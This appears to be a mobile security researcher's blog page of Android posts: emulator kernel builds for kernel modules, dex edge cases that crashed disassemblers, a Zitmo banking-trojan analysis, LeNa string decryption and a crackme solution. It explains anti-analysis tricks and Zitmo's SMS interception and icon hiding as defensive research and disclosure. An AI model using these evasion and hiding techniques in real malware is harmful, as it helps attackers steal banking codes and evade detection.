0
Compiling an Android Emulator Kernel for Loadable Kernel Modules

So you want to rootkit the emulator? These are rough notes I took while attempt to get this working on my own machine (OSX 10.8.5) – results may vary. According to random posts I’ve seen, OSX is a bit finicky and no one really gets it to work right – Ubuntu everything is apparently just peachy. You’ve been warned though, YMMV.
If on OSX, you must install libelf – this was the only dependency I was missing. If you don’t have this the build will randomly fail and not be exceptionally helpful about why.

Building the Kernel
Clone emulator kernel directory then get the branch of the kernel we want

git clone https://android.googlesource.com/kernel/goldfish

cd goldfish
git checkout -t origin/android-goldfish-2.6.29 -b goldfish

Before we build the kernel we must configure it, though we don’t want the default configuration (this doesn’t actually let the emulator boot) and we want to ensure LKM support is present. Note that the feature to load is seperate from the unload feature, you must enable both. Let’s first copy the configuration for goldfish_armv7_defconfig. Then manually change the LKM state (goldfish_armv7_defconfig will default to having modules enabled and loadable, but not unloadable) to any features we need.

make ARCH=arm goldfish_armv7_defconfig

make ARCH=arm menuconfig

If you are compiling on OSX, you will want to manually edit the .config file to not include CONFIG_NETFILTER, simply comment this line out before proceeding. You will be prompted to confirm this change prior to compiling as well. If you do not make this change you’ll see an issue similar to this appear;

make[2]: *** No rule to make target net/netfilter/xt_CONNMARK.o', needed by net/netfilter/built-in.o’. Stop.
make[1]: *** [net/netfilter] Error 2
make: *** [net] Error 2

Compile the kernel, modify the CROSS_COMPILE switch as necessary for your builders setup;

make ARCH=arm SUB_ARCH=arm CROSS_COMPILE=$ANDROID_NDK_ROOT/toolchains/arm-linux-androideabi-4.4.3/prebuilt/darwin-x86/bin/arm-linux-androideabi-

If you are unsure where to point CROSS_COMPILE, you can try below to help narrow it down, assuming you have

$ANDROID_NDK_ROOT set;
find $ANDROID_NDK_ROOT | grep ‘\-gcc$’

Making the Emulator use the Newly Compiled Kernel
The easiest way to use the kernel immediately is to just point an already existing AVD image at it via the emulator command;

emulator -kernel arch/arm/boot/zImage -avd -verbose

You don’t need -verbose, obviously, though it would be helpful the first time to watch for the potential segfault or if the kernel image was bad. If the “android” doesn’t appear in the emulator box and nothing is streaming to the console, you likely borked one of the above steps. You should try to enable the “Use Host GPU” setting for the avd as well, since this appears to drastically improve performance of the emulator for most MacBook Pros.
Another potential way to use the kernel is to copy the kernel from arch/arm/boot/zImage into one of your platforms, this will cause all AVDs using that platform to use the customer kernel. The path for that is something like $ANDROID_SDK_ROOT/system-images/android-17/armeabi-v7a/kernel-qem.

If you run into something like below (verbose output from emulator command, happen almost immediately);

emulator: Kernel parameters: qemu.gles=0 qemu=1 console=ttyS0 android.qemud=ttyS1 android.checkjni=1 ndns=3
emulator: Trace file name is not set

emulator: autoconfig: -scale 0.821094
Segmentation fault: 11

This is likely from some weirdness in the avd from not shutting down properly (or just using it, the emulator is horrid). The easiest way to recover is just kill it (rm -rf ~/.android/avd/*) and recreate the avd.

Making a LKM
Shortly I’ll post an example to github, but for now here is a very simple LKM that should compile fine.
Makefile, should be fully complete, you may need to change the path of both KERNEL_DIR and CCPATH;

The helloworld code for android_module;

Dump both of these into any directory and run make after making the appropriate changes. You should then have an android_module.ko file.

From here just push it to the emulator via adb, then use insmod/lsmod/rmmod as needed and enjoy. Depending on the time I have for the rest of the week, I’ll try to dump some kernel modules I’ve written and used for malware analysis on my github.

0
Loose Documentation Leads to Easy Disassembler Breakages

As people have seen in the past, I tend to have a fun time finding edge-cases which break tools. Often you can find these types of edge-cases while reading documentation and cross referencing the implementation of that in the systems your validating. A pretty good example of this is highlighted in my BlackHat 2012 talk, where I was looking at the header section, which is described as always have the value of 0×70. When looking at the open source tools, some checked to make sure this was true – others ignored it. The actual code in the Dex Verifier is as follows;

From this we can see the actual implementation doesn’t care what the size of, as long as it is larger than the current structure size, which is 0×70. This allows for the verifier to be forward compatible, though if anyone was creating a tool and only read the documentation – this might not be fully understood or assumed.

This leads me to two extremely easy breakages which I never mentioned in my talk, but noticed IDA Pro 6.4 and Radare would fail against. The issue that IDA Pro and Radare broke against, was a bad file magic. According to the documentation the magic bytes are the following;

DEX_FILE_MAGIC
embedded in header_itemThe constant array/string DEX_FILE_MAGIC is the list of bytes that must appear at the beginning of a .dex file in order for it to be recognized as such. The value intentionally contains a newline (“\n” or 0x0a) and a null byte (“\0″ or 0×00) in order to help in the detection of certain forms of corruption. The value also encodes a format version number as three decimal digits, which is expected to increase monotonically over time as the format evolves.

ubyte[8] DEX_FILE_MAGIC = { 0×64 0×65 0×78 0x0a 0×30 0×33 0×35 0×00 }
= “dex\n035\0″

Note: At least a couple earlier versions of the format have been used in widely-available public software releases. For example, version 009 was used for the M3 releases of the Android platform (November–December 2007), and version 013 was used for the M5 releases of the Android platform (February–March 2008). In several respects, these earlier versions of the format differ significantly from the version described in this document.

So one might assume that the currently accepted magic bytes will be exactly “dex\n035\00″ – though, they would be wrong in assuming this. If we take a look at the code in DexFile.h;

We can see that there are constant magic bytes of “dex\n”, but the versioning afterwards – which is loosely explained in the documentation, has multiple options. Since API level 14 on, the verifier has accepted both “036\00″ and “035\00″ as valid versioning parts of the magic bytes. Since the magic bytes are not part of the checksum or the signature of the dex file, one can simply bump the version number without any specialized tools, just doing it with a hex editor would be fine. This lead to Radare failing to load the file and IDA Pro to thinking the file was corrupt with the following dialog and log output;

Corrupt File Dialog

I originally reported this issue to January 22nd, 2013 and received a thank you and a fix back from them only two days later on the 24th. I’m unsure if they sent this out to all their customers or have it totally bundled into their latest packages, but you should easily be able to request it if not. For Radare I submitted a patch for this issue which was quickly merge upstream by the extremely proactive author of the tool.

The second breakage, which only directly effected IDA Pro, was revolving around the file size as dictated by the dex_header vs the actual file size. IDA Pro was comparing the two, and if they where not actually equal – assumes the file is corrupt. The documentation states, “size of the entire file (including the header), in bytes”, though the implementation of the code doesn’t actually care – as seen from the DexSwapVerify.cpp file;

As we can see from above, if the actual length must be at least as large as the expected length, most likely to avoid any truncated files. Though it can easily be larger, which will just produce a warning – though processing of the dex file will continue. However, the same corrupt file dialog with this logging message comes up when loaded in IDA Pro;

Corrupt File Dialog

This was also fixed on the same timeline as the other issue I reported to Hex-Rays, so if you run across any files like this you will be prompted with this dialog;

Extra data

Just two small little issues that came about when looking at the implementation of the file format. These edge-cases always seem to exist in ever system, especially when creating reversing/disassembling/analyzing tools.

15
Javascript Malware Cross-Contamination in Android apks

A colleague of mine, specifically from a different AV vendor, was poking around some files and was curious as to what these somewhat odd files where;

VirusTotal Analysis Sha1: e4105ae117e62c784e26ae113a6119bd33a570cf
VirusTotal Analysis Sha1: 16111c45832a20914cfd9306501b406e2ae89b58

An apk (Android package) which is being detected by a ton of vendors, as having a javascript trojan dropper inside of it. Wait what? Is this some interesting new breed of Android malware, possibly leveraging USB attacks too!? Well, no – no it isn’t, it actually just is a curious case of cross-contamination.

These files appear to be “infected” inside the embedded HTML files;

We can see the offending code which is being flagged, nothing to do with any of the actual Android parts. We can see this is the actual detected part by just looking it up on VirusTotal.

Which looking up that sha1 gives us;
VirusTotal Analysis Sha1: 3c4e3917661442be9ec92adf6ba5b93989a4dd7e

So does this seem intentional, or accidental? Was someone actually trying to infect Android devices, or was this just a strange mishap? I’m inclined to believe this was just a strange coincidence, both of the applications are the Android settings application, “com.android.settings” – and signed with the commonly found AOSP debug signer. What appears to have happened, is someone was compiling the AOSP, possibly for a custom ROM, and had these HTML files located on an infected host. The virus then infected these HTML files by injecting the javascript load code, and then these APKs where bundled. We can see that these where actually properly bundled;

The interesting part is that the signature did verify, meaning that at time of signing for this APK, that javascript file was included.

So did this actually do anything to the devices? No – not really, however there might be someone with a custom ROM which has all these files on their device. Since the url’s being added are all long since dead, there shouldn’t any adverse side effects. Though it would appear that the application is going to read the contents of the HTML files in, then load them into an AlertDialog – where that javascript should not actually perform any actions.

As a last side note – I did edit the output that is displayed in this blog to be “hxxp” opposed to “http”. When I didn’t do this, even though the scripts where not being executed, Google Safe Browsing was blocking me from ever seeing my own blog :)

0
Android Zitmo Analysis: Now you see me, now you don’t

Early last week, Denis from Kaspersky had blogged about a new Zitmo (Zeus in the Mobile) variant which was affecting both Android and Blackberry. After some digging I was finally able to turn up a sample for analysis. Originally I figured it would be the same old sample as before, wouldn’t do much and not be very sophisticated at all. Turns out I was half right, most of it was identical to previous samples – though I did learn new little trick from the malware this time around.

After I did a tear down I submitted a sample to Mila over at the Contagio Mobile Dump, so if you’d like to follow along the sample I was dissecting you can find it here.

Firing up our trusty keytool, we can see what the certificate is – try to get an estimated date when this file was created;

So, assuming that the malware author hasn’t been messing around with timestamps, we can assume that the malware was created before or on July 24 of this year – and signed on that day as well. As a sanity check, the Android debug certificate validates this, since it was created before this date. This is in no way concrete that it was actually build/signed on that day – but it does give us a decent idea of the timeframe.

The next piece of interest lays within the AndroidManifest.xml – let’s see how the author intends this application to be started;

According the AndroidManifest above we can see the application has four main entry points;

  • MainActivity – launched as the main activity, which should be visible by the launcher/tray
  • ActionReceiver – launched when the HOME, BOOT_COMPLETED or USER_PRESENT intent is fired by the system
  • SmsReceiver – launched when the SMS_RECEIVED intent is fired, with a priority of Integer.MAX_VALUE
  • RebootReceiver – launched when the REBOOT or ACTION_SHUTDOWN intent is fired

This seemed like a bit to many receivers right off the bat, it seems odd that there is a reboot receiver – though maybe the author was trying to more than just intercept SMS messages? Let’s first dig into the code and see how the malware is looking to get started. Loading up IDA Pro and a terminal with baksmali, there is something we can notice right off away, the authors where using the latest Android SDK – there is a ton of support code in the android/support directory used for backwards compatibility. It’s actually a bit funny as there is more code in those files than the malware itself!

Looking at the MainActivity default create method, we can see the only code which a user might actually see when the malware is launched;

MainActivity.onCreate

MainActivity.onCreate, cleaned up a bit


Essentially the bulk of the of the code is just checking a PersistenceManager object, which is just a wrapper for the normal Android SharedPreference object. This checks to see if the application has been run or not before. If the application has not been run, it will mark the first run as having occurred – followed by running the SmsReceiver.sendInintSms() function. This function, pictured below, gets the default admin number (+46769436094) and sends it the message “INOK”.
SmsReceiver.sendInintSms()

SmsReceiver.sendInintSms()


The next receiver to look at is the ActionReceiver. This is also very simple – essentially if the intent is either BOOT_COMPLETED or USER_PRESENT then it will attempt to kick of the MainActivity, which would cause the code above to be launched. This is also gated by the same isFirstLaunch function from the PersistenceManager class. The cleaned up code for this receiver is below, pretty self explanatory as well;
ActionReceiver.onReceiver(...)

ActionReceiver.onReceiver(…)


The main functionality of the malware is located where it has been for the last few Zitmo samples, inside the SmsReceiver. The onReceive method essentially houses a large switch statement which will allow the following commands to be parsed;

  • “on” – replies “ONOK” if sent from admin #, then sets the sms interceptor on
  • “off” – replies “OFOK” if sent from admin #, then sets the sms interceptor off
  • “set admin ${#}” – replies “SAOK” if sent from admin #, then sets a new admin # to user

All of the commands above will have their broadcast aborted, so no other application should receive the SMS message. If any other SMS is received other than the commands above the code follows a simple path. It will abort the broadcast aborted and the message sent to the admin number in the format of: “message ${SMS_BODY}, F: ${SMS_SENDER}”. These basic commands, combined with the a PC infected with Zeus, is enough for the authors to programmatically intercept mTans for what would appear to be German bank users.

So what, right? I said there was something interesting about this malware – yet everything described has been old stuff. Well the interesting part for me happened when I looked at the last receiver, which didn’t seem like it would be necessary. The malware already has all the code it needs to function as normal, right? Well – it actually is going to attempt to hide itself from the user on a reboot. If we look back at the AndroidManifest.xml we can see the activity tag which lets the application appear in the launcher/tray of the device;

Previously, we’ve seen malware that avoids putting this into the manifest, trying to hide from the user. In this case, the malware does want to be found and hopefully executed by the user. The trick is, they only want this to be visible to the user for one boot. If we take a look at the RebootReceiver.onReceive function, we can see a simple code path that checks for the REBOOT or ACTION_SHUTDOWN intents. If either is caught by their receiver, it will call the MainActivity.hideIcon() function. The pseudo code for this function is as follows;

This code will dynamically remove the receiver component, even though it is still set within the AndroidManifest.xml. This means on reboot, the icon will no longer be present inside the launch/tray of the device, but the other receivers should still remain active. While this isn’t rocket science – mainly just understand the Android APIs, it’s something I’ve never seen any malware do. Performing a few Google searches, it doesn’t seem to be something widely used or deployed in practice. I did perform a few searches though for applications that did this and found a few that used this to be “less annoying” to a user and hide when they where not wanted. This is also recommended for something like an option BOOT_COMPLETE intent, such as an option service that a user might not want from an application.

TL;DR – You can dynamically disable you competent in your Android application, effectively “hiding” yourself from a users launcher/tray.

1
Dexploration: What a default Dex looks like

During the research phase of my Blackhat talk, I was digging into detecting the default layout of a dexfile, as generated by the normal dx tool. Originally, my concept was that I wanted my tool to “stack” things inside the file the same way that the dalvik compiler would, though I couldn’t find any actual resources on what this actually looked like. After a few hours of digging through code on AOSP and tearing apart an actual dex file to look at the innards, I came up with the quick little ASCII diagram below;

The result of the APKfuscator actually ended up being quiet different than the above mappings. It’s definitely possibly to retain the structure, however the sections can easily be interchanged. The resulting sections from my tool look like the following;

The patterns for the normal dx compiler appear to always lay out the same, so if someone has developed a post-compilation modification tool (i.e. – APKfuscator or (bak)smali), it might be possible to see that a dex file has been “changed”. If someone was to develop a tool to look for patterns about how this data is laid out, it could lead to some interesting results. Being able to detect these changes and patterns, run on a large enough scale, could be an interesting tactic to finding out whether or not someone has messed with a file quickly. Hopefully I’ll have more time to research this area and either prove or disprove this theory. Though, until then – hopefully the small ASCII layouts might help someone else with whatever work they’re doing on dalvik research.

1
A Lesson in Safe Dex
Presenting at Blackhat 2012

Presenting at Blackhat 2012

It’s been almost a full week since my talk, Dex Education: Practicing Safe Dex, though I think I’m only now beginning to recover. The past few months have truly been a whirlwind of both working on dissecting malware at Lookout and working on putting together a solid presentation for BlackHat. So far I’ve been unable to draw a crowd like Charlie, though maybe someday I’ll have people sitting in the aisles fighting for a seat during a presentation. Until then the people who went will just have to deal with the extra legroom. Over all the presentation seemed to go over pretty well, some interesting chats afterwards with some smart people. A few people where interested in the slides and proof of concept code, so I told them I would tweet it and also make a blog post about it.

My slides are available here with the proof of concept code being hosted on my github page here. The proof of concept crackme code on the same github page as well shortly.

I’ve got some extra content that I wasn’t able to fit into the slide-deck, heck it was 96 slides as is after trimming some things out. While I didn’t intend to try and cover everything possible to break most analysis tools, I wanted to attempt to cover as much as possible. Over the course of a few days or weeks, I’ll try to roll out details in my blog about how certain things worked, mainly for people who where unable to attend the presentation, hear my explanations or ask me things at the conference. Feel free to reach out to me if there is anything I’ve missed or you would live a better explanation about.

A few people asked me about Blackhat and Defcon – wondering if it’s worth attending. So to step on a soap box just for a minute, I’ll give the mini speech that I normally tell people. Conferences are only worth what you put into them, go to talks that seem interesting and are outside of your direct field of work. Why attend talks outside the direct field of work? I’ve found it’s a great way to try and find different perspectives, which often can be related back into your own work and field. It is also quiet hard to appreciate a talk on something that you deal with daily, definitely very important to try and keep this in mind if you do see those types of talks. As a presenter myself, I found it exceptionally hard to not go too low level while still feeling like I can add value to everyone in the audience. After attending the talks you chose, meet the presenters and pick their brains, this is honestly where you can learn the most. As I have said, it’s really hard to make a presentation accessible for a whole audience, talking directly with these people will give you so much more information than the slides often do. The people you meet at the bars (for Blackhat @ Caesars goto the Galleria bar) are often people you talk to online already. Make friends, go outside that comfort zone and buy some people drinks. Most everyone is friendly, if they aren’t – don’t drink with them. Almost all conferences are worth going to, Blackhat and Defcon included, mainly due to the talent it attacks that you can find hanging out at the bars.

Probably the greatest thing about Blackhat for me was to meet some really great people I’ve only had the pleasure of talking to online. Talking with Mila, the mind behind Contagio Dump, was really great – able to pay her back a little for all the hard work she does with a beer or two. Got to talk with some of the original DroidSecurity (now AVG) guys, Elad and Oren, it’s never a dull moment talking to an Israeli reverse engineer – just look at Zuk. Another interesting person who I got to hang out with was along side me in the malware talk track, @snare. He did some crazy things with EFI rootkits for OSX, pretty scary and interesting stuff all in the same talk.

People often say it isn’t what you know, but who you know. I’d argue the security space is a ying and yang of both; to be a valuable (reverser) engineer you need to know your stuff and the people to help you succeed.

Enough on this soapbox, hopefully you enjoy the slides and code. If you ever run into me at a conference – let’s have a beer or two and chat.

0
Mobile Security Meetup, DexTemplate and smali-mode!

Tonight there was a great meet up at the Lookout HQ, Mobile Security and Privacy – got to meet a bunch of really smart mobile developers. The topic at hand was one close to me, reverse engineering Android applications. The concept was to show developers how easy it is to do and to help them understand how an attacker might see their code. Along with showcasing the normal tools people use in their day to day lives one of my coworkers, Emil, gave a great little presentation on the overview of how reversing is done for Android. After the demonstration, Emil had some prepared crackmes for people to try, most of the engineers did surprisingly well for not having reversed anything before!

After talking with a few people who where asking about reversing, I completely forgot that I’ve never really mentioned 010 Editor. This is by far one of the best hex editors I’ve ever used, with an excellent ability to use templates. One of the best parts is, a little over half a year ago, they came out with a fully native OSX client. On top of that Jon Larimer has created a DEX template for it available on his github. This is definitely a great way to visualize a dex file and help look for anomalies in them.

Recently I’ve actually submitted some pull requests which Jon has accepted to better parse the dex files. They should be able to parse the latest dex files generated by the jellybean toolkit and even handle some “oddities” that I’ll be releasing at my BlackHat 2012 talk.

Along my route for completing my BlackHat talk, Dex Education: Practicing Safe Dex, I finally updated the small mode for emacs. It’s available on my github page. It should have color parsing for just about all the elements available inside a smali file – along with the newer jumbo opcodes.

Around the same time as my presentation at BlackHat, I’ll be posting the slides and proof of concepts to my github. So check back soon for some interesting way to break (and fix) disassembly/decompilation tools for Android.

0
Static decryption for Android LeNa.[b/c] using IDA Pro

Recently at Lookout we blogged about a newer flavor of Legacy Native (LeNa). This variant is extremely similar to the other ones we’ve found in the past and blogged about in October of 2011, the full tear down I wrote can be found in pdf form here. The samples for both LeNa.b and LeNa.c have been added to the Contagio Mini Dump

While going through some samples I decided to throw together a quick IDC script for IDA Pro to help decrypt the commands and variables without executing the code. The decryption isn’t hard, in fact it actually ends up just being an XOR with 0xFF. Though if anyone hasn’t ever dealt with IDA Pro or ARM, it might look a bit confusing at first. Below is the decryption function commented from one of specific samples of LeNa;

Simple XOR

Simple XOR with 0xFF


The IDC script is really simple, the current version can be found on github with the current version featured below;

The script should be really easy to follow, I tried to comment it well enough. Essentially when you load the script it will bind the function for decrypting to the “/” key. Find the pointer to the encrypted data like below;

Highlighted pointer to the encrypted data


Next just follow the pointer to it’s selection in the text section. Once the encrypted pointer is highlighted, simply hit the assigned hot-key “/” and let the script do it’s job. The script will dump the decrypted message to the output window and also add a comment next to the pointer as seen below;

The script also traverses back to all the cross references (xrefs) and will add a comment to all those spots where this variable is used.

The original usage in the decryption function

The main use of the decrypted data in another function

The main use of the decrypted data in another function


Nothing too fancy or complicated, though it was a nice way to get into IDC scripts for IDA Pro. Also it’s a good way to start segwaying people who may only have used baksmali or dex2jar into using IDA Pro for ARM reversing.

0
Ops, did I publish that in the AOSP?

A while back when grep’ing through the AOSP for package manager references, I noticed something weird;

What’s this directory? What is contained in it? Let’s look at the readme;

Ops! Did someone mean to publish this repo? It’s all a bunch of experimental and interesting code. Granted it’s a bit old now, but still very interesting to look at. Specifically there are what looks to be the precursor to fragments and ui testing automation, done and committed before the final work was committed to AOSP. There is also the DroidDreamCleaner utility which is interesting. While it was an fix for an old issue, it’s just interesting to see how Google coders handled the issue without having to reverse it. We can even see a “DreamThreater” application which looks like some work done to make an Android screen saver. Sadly not all this code can compile since it relies on some code which isn’t accessible to us and the released branches of AOSP. It seems this code may have been mistakenly committed to the public branch after the kernel.org mishaps, as it appears to have been made public after AOSP became available on Google’s own servers.

If you don’t have all of AOSP pulled, you can get it by just cloning the following repository;

Again, nothing ground breaking – but definitely an interest repository of code to take a look at, if not to see how Google coders work on “internal” code which isn’t released but to see their comments and documentation that is sometimes stripped from AOSP :)

2
InsomniDroid – crackme solution

It’s a bit amusing that this solution for the InsomniHack CTF challenge named “InsomniDroid” was written up past midnight because I couldn’t sleep. Regardless, this was typed up as a play-by-play analysis taken from my crib notes when I actually was solving the crackme, so try to bare with me as this may read a bit odd. While some of the steps might seem odd – I find it is often just easier to tackle each APK in the same manner. This sets up a nice way to quickly find the call-stack and how things get executed and where. When tackling this challenge, I attempted to only use baksmali, opposed to any other tools for simplicity and since not everyone has IDA Pro. Anyway, if you haven’t downloaded the challenge yet you can get it from root-me.org or from this local mirror (MD5: c2f94fd52c8f270e66d8b16e07fe93e4). If you haven’t solved the challenge yet, I’d recommend to stop reading here and give it a good try.

Starting off, we shoudl take a quick look at the AndroidManifest.xml through AXMLPrinter shows which is the main activity;

Now we see what where to start our search without opening the app yet, toss that crackme into baksmali and get ready for the output. No baksmali tricks in place, so we can just take a look right at the main activity, InsomniActivity. The only interesting bits for us is the call to compute method on keyBytes and setting an onClick listener for the validate button;

Seems weird that we’re computing something, though never doing anything with the returned result. Let’s just take note of that and come back later. If we look into the onClick listener (InsomniActivity$1) we can see what is going on deeper in the app;

Here we can see the bulk of this onClick listener just grabs the text from the EditText widget and uses it as a parameter for the checkSecret function. Now onward to the checkSecret function;

Ok, this doesn’t help us much. As we can see from the inlined comments I put above, all it’s doing is a SHA-256 hash for our input and comparing it to secretHash – which obviously must also be a SHA-256 digest. Let’s see if we can find this being set anywhere;

Only one hit – this is good. Let’s go back into Compute.smali and check out whats actually going on. Once we get in here we can see what appears to be, some left over code, along with an array-fill for the secretHash which is trigger the sput-object search we just performed. Let’s get the hash;

6152587ede8a26f53fd391b055d4de501ee8b2497fe74f8fd69f2c72e2f3e37a

And toss that into a hashcat… Maybe it’s an easy one to get and I won’t have to do any other work… Probably not – that would seem like a brute force challenge and not a crackme one, definitely not something simple like that for someone named “crypto girl”. So lets keep looking!

Looking back at Compute.smali lets looks back into that function, compute([B) we noticed being called earlier in the APK - but never had the return value used. This one looks interesting because (1) it's seems left over, is called once but not using the return value and (2) it's the only place certain left over variables are being touched like c1_null, c2 and is also expecting the parameter keyBytes which we also have a variable for.

This seems interesting… It’s taking in the keyBytes as a parameter, using them to create a SecretKeySpec then using the ivBytes to initialize an IvParameterSpec. Then it attempts to decrypt the c1_null variable, though it does nothing with this return value. After that, we decrypt something that is much larger and again, don’t do anything with the value. Essentially this maps out to the following java code;

At this point I’m assuming I just solved this — run the app, look at the output… Garbage — it’s just not UTF-8 (or UTF-16) characters. That can’t be it — I don’t think the challenge would be to include non-ascii characters!

After staring at this a bit longer I decided to look at the lengths of what is being output. result has a length that will always going to be 16. p2 will end up having a length that is always being divisible by 16… Well – lets try some operations between the two resulting arrays that aren’t being used. First one I tried was XOR’ing them together (everyone loves XOR, malware writers, crackme writers, etc, etc) — and this ended up being exactly what needed to be done.

After running this we get the output;

Ah – Crypto girl left us a nice crypto related message. Essentially explaining what went on here. Fun stuff and definitely glad I didn’t wait for hashcat to try and spit out that password.

1 2 3 4 >